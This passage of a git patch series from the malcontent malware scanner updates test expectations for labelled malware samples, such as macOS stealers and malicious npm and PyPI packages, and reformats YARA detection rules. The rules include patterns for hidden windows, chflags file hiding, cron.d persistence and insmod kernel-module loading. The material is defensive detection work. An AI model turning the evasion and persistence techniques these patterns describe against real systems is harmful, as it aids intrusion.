 | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
diff --git a/tests/macOS/2024.BeaverTail/client_5346.py.simple b/tests/macOS/2024.BeaverTail/client_5346.py.simple
index 1a44a30ed..71e1b84c2 100644
--- a/tests/macOS/2024.BeaverTail/client_5346.py.simple
+++ b/tests/macOS/2024.BeaverTail/client_5346.py.simple
@@ -5,6 +5,7 @@ data/encoding/base64: low
 discover/system/platform: medium
 discover/user/HOME: low
 evasion/file/prefix: medium
+evasion/indicator_blocking/hidden_window: medium
 evasion/indicator_blocking/mask_exceptions: medium
 exec/imports/python: medium
 exec/install_additional/pip_install: high
diff --git a/tests/macOS/2024.Ezuri/libdpt1.so.simple b/tests/macOS/2024.Ezuri/libdpt1.so.simple
index 5851a1c32..65223eaba 100644
--- a/tests/macOS/2024.Ezuri/libdpt1.so.simple
+++ b/tests/macOS/2024.Ezuri/libdpt1.so.simple
@@ -3,7 +3,7 @@ anti-static/macho/footer: high
 anti-static/packer/aes: high
 anti-static/packer/ezuri: critical
 crypto/aes: low
-discover/system/cpu_info: low
+discover/system/cpu: low
 exec/plugin: low
 exec/program: medium
 fs/file/read: low
diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple
index 292c43b62..a1eedf707 100644
--- a/tests/macOS/2024.LightSpy/dropper.simple
+++ b/tests/macOS/2024.LightSpy/dropper.simple
@@ -6,9 +6,9 @@ c2/tool_transfer/macos: critical
 crypto/aes: low
 crypto/xor: high
 data/hash/md5: medium
+discover/multiple: high
 discover/process/name: medium
-discover/system/cpu_info: low
-discover/system/network: high
+discover/system/cpu: low
 discover/system/platform: medium
 evasion/file/location/pidfile: high
 exec/dylib/symbol_address: medium
diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple
index 7ac915779..f5189151e 100644
--- a/tests/macOS/2024.Rustdoor/localfile.simple
+++ b/tests/macOS/2024.Rustdoor/localfile.simple
@@ -15,15 +15,16 @@ crypto/aes: low
 data/compression/gzip: low
 data/compression/zstd: low
 data/embedded/zstd: medium
-discover/network/interface_get: low
-discover/system/cpu_info: medium
-discover/system/hardware_info: low
-discover/system/hostname_get: low
+discover/network/interface: low
+discover/system/cpu: medium
+discover/system/hardware: low
+discover/system/hostname: low
 discover/user/USER: low
+evasion/file/attr/chflags: high
 exec/dylib/symbol_address: medium
 exec/program: medium
 exec/program/background: low
-exec/program/hidden: low
+exec/program/hidden: medium
 exec/script/osa: medium
 exec/shell/exec: medium
 exfil/stealer/notes: critical
diff --git a/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple b/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple
index dafd23ce8..685d7b1d2 100644
--- a/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple
+++ b/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple
@@ -12,7 +12,7 @@ data/hash/blake2b: low
 data/hash/sha1: low
 data/random/insecure: low
 discover/network/interface_list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: low
 exec/cmd/pipe: medium
 exec/dylib/address_check: low
diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff
index 939d68075..523345be4 100644
--- a/tests/macOS/clean/ls.mdiff
+++ b/tests/macOS/clean/ls.mdiff
@@ -1,13 +1,13 @@ ## Deleted: ls.x86_64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|---------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | -| -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | -| -LOW | 
[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|---------|------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | +| -LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | +| -LOW | 
[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) |
 ## Added: ls [🔵 LOW]
diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2
index 9e0e93a9c..902593b69 100644
--- a/tests/macOS/clean/ls.sdiff.trigger_2
+++ b/tests/macOS/clean/ls.sdiff.trigger_2
@@ -1,6 +1,6 @@
 --- missing: ls.x86_64
 -data/compression/lzma
--discover/system/hostname_get
+-discover/system/hostname
 -exec/shell/TERM
 -fs/link_read
 -net/url/embedded
diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3
index 9e0e93a9c..902593b69 100644
--- a/tests/macOS/clean/ls.sdiff.trigger_3
+++ b/tests/macOS/clean/ls.sdiff.trigger_3
@@ -1,6 +1,6 @@
 --- missing: ls.x86_64
 -data/compression/lzma
--discover/system/hostname_get
+-discover/system/hostname
 -exec/shell/TERM
 -fs/link_read
 -net/url/embedded
diff --git a/tests/npm/2024.harthat/deference.js.simple b/tests/npm/2024.harthat/deference.js.simple
index 96d9cf0f3..9c67ea4d0 100644
--- a/tests/npm/2024.harthat/deference.js.simple
+++ b/tests/npm/2024.harthat/deference.js.simple
@@ -1,6 +1,6 @@
 # npm/2024.harthat/deference.js: critical
 c2/addr/ip: high
-c2/addr/url: medium
+c2/addr/url: high
 discover/system/platform: medium
 evasion/indicator_blocking/echo_off: high
 fs/file/delete: medium
diff --git a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple
index 20bc9d6e8..5fff8faa7 100644
--- a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple
+++ b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple
@@ -1,7 +1,7 @@
 # npm/2024.legacyreact-aws-s3-typescript/package.json: critical
 c2/tool_transfer/npm: critical
 c2/tool_transfer/shell: high
-exec/program/hidden: low
+exec/program/hidden: medium
 exec/shell/background_launcher: high
 exfil/npm: high
 fs/file/make_executable: medium
diff --git a/tests/npm/2024.next-react-notify/tocall.js.simple b/tests/npm/2024.next-react-notify/tocall.js.simple
index 60a0942ec..094947a69 100644
--- a/tests/npm/2024.next-react-notify/tocall.js.simple
+++ b/tests/npm/2024.next-react-notify/tocall.js.simple
@@ -1,7 +1,7 @@
 # npm/2024.next-react-notify/tocall.js: critical
 anti-static/obfuscation/powershell: critical
 c2/addr/ip: high
-c2/addr/url: medium
+c2/addr/url: high
 discover/system/platform: medium
 evasion/bypass_security/executionpolicy_bypass: high
 evasion/indicator_blocking/echo_off: high
diff --git a/tests/npm/2024.persona-tool/preinstall.js.simple b/tests/npm/2024.persona-tool/preinstall.js.simple
index b01cbfb82..6f3ca3470 100644
--- a/tests/npm/2024.persona-tool/preinstall.js.simple
+++ b/tests/npm/2024.persona-tool/preinstall.js.simple
@@ -3,7 +3,7 @@ anti-static/obfuscation/hex: medium
 c2/addr/ip: medium
 c2/discovery/ip_dns_resolver: medium
 data/encoding/json_encode: low
-discover/system/hostname_get: low
+discover/system/hostname: low
 exfil/nodejs: critical
 exfil/oob: critical
 net/dns: low
diff --git a/tests/php/clean/composer-2.7.7.simple b/tests/php/clean/composer-2.7.7.simple
index 3732878d1..6f3daa588 100644
--- a/tests/php/clean/composer-2.7.7.simple
+++ b/tests/php/clean/composer-2.7.7.simple
@@ -18,7 +18,7 @@ data/embedded/base64_url: medium
 data/embedded/pem_certificate: low
 data/encoding/base64: low
 data/encoding/reverse: low
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
diff --git a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
index 110a2dbd1..c7d13b7c0 100644
--- a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
+++ b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
@@ -1,8 +1,8 @@
 # python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py: critical
 c2/tool_transfer/python: critical
 discover/ip/public: high
+discover/multiple: medium
 discover/network/interface_list: medium
-discover/system/network: medium
 discover/system/platform: medium
 discover/user/name_get: high
 evasion/file/prefix: medium
diff --git a/tests/python/2023.JokerSpy/shared.dat.simple b/tests/python/2023.JokerSpy/shared.dat.simple
index 4717f624a..a9253ba93 100644
--- a/tests/python/2023.JokerSpy/shared.dat.simple
+++ b/tests/python/2023.JokerSpy/shared.dat.simple
@@ -5,8 +5,8 @@ anti-static/obfuscation/python: high
 c2/tool_transfer/python: high
 data/base64/decode: medium
 data/encoding/base64: low
+discover/multiple: high
 discover/network/interface_list: medium
-discover/system/network: high
 discover/system/platform: medium
 discover/user/name_get: low
 evasion/file/prefix: medium
diff --git a/tests/python/2024.Custom.RAT/output.py.simple b/tests/python/2024.Custom.RAT/output.py.simple
index 5ddebac73..da913dc29 100644
--- a/tests/python/2024.Custom.RAT/output.py.simple
+++ b/tests/python/2024.Custom.RAT/output.py.simple
@@ -14,9 +14,9 @@ data/encoding/base64: low
 data/encoding/json_decode: low
 discover/ip/geo: high
 discover/ip/public: high
+discover/multiple: high
 discover/network/interface_list: medium
 discover/process/name: medium
-discover/system/network: high
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/USER: low
diff --git a/tests/windows/2024.GitHub.Clipper/main.exe.simple b/tests/windows/2024.GitHub.Clipper/main.exe.simple
index d45d4ba9a..6c960140c 100644
--- a/tests/windows/2024.GitHub.Clipper/main.exe.simple
+++ b/tests/windows/2024.GitHub.Clipper/main.exe.simple
@@ -35,7 +35,7 @@ discover/ip/geo: high
 discover/ip/public: high
 discover/network/mac_address: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
 exec/conditional/is_admin: medium
 exec/plugin: low
 exec/program: medium
diff --git a/tests/windows/2024.GitHub.Clipper/raw.py.simple b/tests/windows/2024.GitHub.Clipper/raw.py.simple
index 821ae34d9..340a54e9d 100644
--- a/tests/windows/2024.GitHub.Clipper/raw.py.simple
+++ b/tests/windows/2024.GitHub.Clipper/raw.py.simple
@@ -1,8 +1,9 @@
 # windows/2024.GitHub.Clipper/raw.py: critical
-c2/addr/url: medium
+c2/addr/url: high
 c2/tool_transfer/download: high
 c2/tool_transfer/exe_url: high
 c2/tool_transfer/python: high
+evasion/indicator_blocking/hidden_window: high
 exec/program: medium
 fs/file/open: low
 fs/tempdir: low
diff --git a/tests/windows/2024.aspdasdksa2/creal.pyc.simple b/tests/windows/2024.aspdasdksa2/creal.pyc.simple
index 35c4226f7..8e1ee6ea1 100644
--- a/tests/windows/2024.aspdasdksa2/creal.pyc.simple
+++ b/tests/windows/2024.aspdasdksa2/creal.pyc.simple
@@ -16,7 +16,7 @@ data/base64/decode: medium
 data/encoding/base64: low
 discover/ip/geo: high
 discover/ip/public: high
-discover/system/hostname_get: low
+discover/system/hostname: low
 exec/install_additional/pip_install: high
 exec/program: medium
 exec/tty/getpass: low
diff --git a/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple b/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
index d7c191594..878585519 100644
--- a/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
+++ b/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
@@ -10,6 +10,7 @@ data/encoding/json_decode: low
 data/encoding/json_encode: low
 discover/network/interface_list: medium
 discover/network/netstat: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
From 7cf4f84dc469bdd934aefd5b3fea3d844e9e7e83 Mon Sep 17 00:00:00 2001
From: Thomas Stromberg
Date: Sun, 10 Nov 2024 11:49:58 -0500
Subject: [PATCH 7/7] run yr fmt
---
 rules/data/embedded/embedded-base64-elf.yara | 4 ++--
 rules/discover/network/connectivity.yara | 3 +--
 rules/discover/system/dmesg.yara | 4 ++--
 rules/evasion/file/attr/chflags.yara | 4 ++--
 rules/evasion/file/location/multiple.yara | 2 +-
 rules/evasion/indicator_blocking/hidden_window.yara | 12 ++++++------
 rules/exec/program/hidden.yara | 2 +-
 rules/impact/remote_access/botnet.yara | 3 +--
 rules/net/dns/dns-over-https.yara | 2 +-
 rules/net/ip/spoof.yara | 5 +++--
 rules/persist/cron/etc_cron_d.yara | 6 +++---
 rules/persist/kernel_module/insert.yara | 4 ++--
 rules/persist/kernel_module/module.yara | 2 +-
 rules/sus/geopolitics.yara | 5 +++--
 rules/sus/malicious.yara | 3 ++-
 15 files changed, 31 insertions(+), 30 deletions(-)
diff --git a/rules/data/embedded/embedded-base64-elf.yara b/rules/data/embedded/embedded-base64-elf.yara
index 350411a80..3c2418ec7 100644
--- a/rules/data/embedded/embedded-base64-elf.yara
+++ b/rules/data/embedded/embedded-base64-elf.yara
@@ -1,7 +1,7 @@
 rule base64_elf: high {
 meta:
- description = "Contains base64 encoded ELF binary"
-
+ description = "Contains base64 encoded ELF binary"
+
 strings:
 $header = "f0VMRgEBAQ"
diff --git a/rules/discover/network/connectivity.yara b/rules/discover/network/connectivity.yara
index 02e2f5114..5a4feaef5 100644
--- a/rules/discover/network/connectivity.yara
+++ b/rules/discover/network/connectivity.yara
@@ -1,5 +1,4 @@
-
-rule network_connectivity : low {
+rule network_connectivity: low {
 meta:
 description = "checks Internet connectivity"
diff --git a/rules/discover/system/dmesg.yara b/rules/discover/system/dmesg.yara
index d702f0060..50f9f9057 100644
--- a/rules/discover/system/dmesg.yara
+++ b/rules/discover/system/dmesg.yara
@@ -3,8 +3,8 @@ rule dmesg {
 description = "accesses the kernel log ring buffer"
 strings:
- $dmesg = "dmesg" fullword
+ $dmesg = "dmesg" fullword
 condition:
 any of them
-}
\ No newline at end of file
+}
diff --git a/rules/evasion/file/attr/chflags.yara b/rules/evasion/file/attr/chflags.yara
index a562cbdd7..41fcea50d 100644
--- a/rules/evasion/file/attr/chflags.yara
+++ b/rules/evasion/file/attr/chflags.yara
@@ -1,11 +1,11 @@
-rule chflags_hidden : high {
+rule chflags_hidden: high {
 meta:
 description = "hides files using chflags"
 ref = "https://man.freebsd.org/cgi/man.cgi?chflags(1)"
 strings:
 $chflags = /chflags.{0,3} hidden [\w\.\/]{0,24}/
-
+
 condition:
 any of them
 }
diff --git a/rules/evasion/file/location/multiple.yara b/rules/evasion/file/location/multiple.yara
index ee1f07fb2..7039993b6 100644
--- a/rules/evasion/file/location/multiple.yara
+++ b/rules/evasion/file/location/multiple.yara
@@ -15,5 +15,5 @@ rule multiple_elf: high linux {
 $ = /\/var\/spool\/[\%\w\-\/\.]{0,64}/
 condition:
- filesize < 1MB and uint32(0) == 1179403647 and 80% of them
+ filesize < 1MB and uint32(0) == 1179403647 and 80 % of them
 }
diff --git a/rules/evasion/indicator_blocking/hidden_window.yara b/rules/evasion/indicator_blocking/hidden_window.yara
index e17c82436..35d40bb12 100644
--- a/rules/evasion/indicator_blocking/hidden_window.yara
+++ b/rules/evasion/indicator_blocking/hidden_window.yara
@@ -1,10 +1,9 @@
-
 rule subprocess_CREATE_NO_WINDOW: medium {
 meta:
 description = "runs commands, hides windows"
 strings:
- $sub = "subprocess"
+ $sub = "subprocess"
 $no_window = "CREATE_NO_WINDOW"
 condition:
@@ -33,7 +32,7 @@ rule subprocess_CREATE_NO_WINDOW_setuptools: high {
 description = "runs commands, hides windows"
 strings:
- $sub = "subprocess"
+ $sub = "subprocess"
 $no_window = "CREATE_NO_WINDOW"
 condition:
@@ -45,10 +44,11 @@ rule subprocess_CREATE_NO_WINDOW_high: high {
 description = "runs commands, hides windows"
 strings:
- $s_sub = "subprocess"
+ $s_sub = "subprocess"
 $s_no_window = "CREATE_NO_WINDOW"
- $o_discord = "discordapp.com"
+ $o_discord = "discordapp.com"
+
 condition:
 filesize < 32KB and all of ($s*) and any of ($o*)
-}
\ No newline at end of file
+}
diff --git a/rules/exec/program/hidden.yara b/rules/exec/program/hidden.yara
index be6cc6a9e..6c76d9529 100644
--- a/rules/exec/program/hidden.yara
+++ b/rules/exec/program/hidden.yara
@@ -1,4 +1,4 @@
-rule relative_hidden_launcher : medium {
+rule relative_hidden_launcher: medium {
 strings:
 $relative_hidden = /\.\/\.[\w][\w\/\.\_\-]{3,16}/ fullword
 $x_exec = "exec"
diff --git a/rules/impact/remote_access/botnet.yara b/rules/impact/remote_access/botnet.yara
index 82f1ab9e2..898e16df1 100644
--- a/rules/impact/remote_access/botnet.yara
+++ b/rules/impact/remote_access/botnet.yara
@@ -4,13 +4,12 @@ rule bot: medium {
 strings:
 $BOTDIR = "BOTDIR"
- $botdir = "botdir"
+ $botdir = "botdir"
 condition:
 filesize < 1MB and any of them
 }
-
 rule botnet_high: high {
 meta:
 description = "References a 'botnet'"
diff --git a/rules/net/dns/dns-over-https.yara b/rules/net/dns/dns-over-https.yara
index b4eb8aada..55ad3f1cf 100644
--- a/rules/net/dns/dns-over-https.yara
+++ b/rules/net/dns/dns-over-https.yara
@@ -11,7 +11,7 @@ rule doh_refs: medium {
 $contentType = "application/dns-message"
 $dnspod = "dnspod"
 $doh_url = "doh-url" fullword
- $cloudflare = "https://9.9.9.9/dns-query"
+ $cloudflare = "https://9.9.9.9/dns-query"
 condition:
 any of them
diff --git a/rules/net/ip/spoof.yara b/rules/net/ip/spoof.yara
index 4183e229a..9b37a7ac3 100644
--- a/rules/net/ip/spoof.yara
+++ b/rules/net/ip/spoof.yara
@@ -6,10 +6,11 @@ rule spoof: medium {
 hash_2022_devicespoofer_2_2_setup = "195d69dc251a045b01fdd6854327c545283b36ebae7c54e06599b14b50ec39e6"
 strings:
- $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword
+ $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword
 $spoof2 = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword
- $not_chk = "Spoofchk"
+ $not_chk = "Spoofchk"
+
 condition:
 any of ($s*) and none of ($not*)
 }
diff --git a/rules/persist/cron/etc_cron_d.yara b/rules/persist/cron/etc_cron_d.yara
index 00c7cfdb5..9f7721074 100644
--- a/rules/persist/cron/etc_cron_d.yara
+++ b/rules/persist/cron/etc_cron_d.yara
@@ -1,11 +1,11 @@
 rule cron_d_user: high {
 meta:
- description = "Uses /etc/cron.d to persist"
+ description = "Uses /etc/cron.d to persist"
 strings:
- $c_etc_crontab = /\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}/
+ $c_etc_crontab = /\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}/
- $not_usage = "usage: cron"
+ $not_usage = "usage: cron"
 condition:
 filesize < 52428800 and any of ($c*) and none of ($not*)
diff --git a/rules/persist/kernel_module/insert.yara b/rules/persist/kernel_module/insert.yara
index 8efd49b77..05254583e 100644
--- a/rules/persist/kernel_module/insert.yara
+++ b/rules/persist/kernel_module/insert.yara
@@ -14,11 +14,11 @@ rule kernel_module_loader: high linux {
 rule kernel_module_loader_sus: high linux {
 meta:
- description = "suspiciously loads Linux kernel module via insload"
+ description = "suspiciously loads Linux kernel module via insload"
 strings:
 $insmod = /insmod [ \$\%\w\.\/_-]{1,32} .{0,16}\/dev\/null 2\>\&1/
-
+
 condition:
 filesize < 10MB and all of them
 }
diff --git a/rules/persist/kernel_module/module.yara b/rules/persist/kernel_module/module.yara
index ab71b2f1f..028c50111 100644
--- a/rules/persist/kernel_module/module.yara
+++ b/rules/persist/kernel_module/module.yara
@@ -29,7 +29,7 @@ rule lkm_embedded_in_elf: high {
 $srcversion = "srcversion="
 condition:
- elf.type == elf.ET_EXEC and all of them
+ elf.type == elf.ET_EXEC and all of them
 }
 rule delete_module: medium {
diff --git a/rules/sus/geopolitics.yara b/rules/sus/geopolitics.yara
index 9c40cb51f..21f2a354d 100644
--- a/rules/sus/geopolitics.yara
+++ b/rules/sus/geopolitics.yara
@@ -1,9 +1,10 @@
 rule ukraine: medium {
 meta:
- description = "Glory to Ukraine!"
+ description = "Glory to Ukraine!"
+
 strings:
 $ref = "слава Украине!"
-
+
 condition:
 any of them
 }
diff --git a/rules/sus/malicious.yara b/rules/sus/malicious.yara
index ff9913619..080e8333b 100644
--- a/rules/sus/malicious.yara
+++ b/rules/sus/malicious.yara
@@ -5,7 +5,8 @@ rule malicious: medium {
 strings:
 $ref = /[a-zA-Z\-_ ]{0,16}malicious[a-zA-Z\-_ ]{0,16}/ fullword
- $not_sshd = "attempt by a malicious server"
+ $not_sshd = "attempt by a malicious server"
+
 condition:
 $ref and none of ($not*)
 }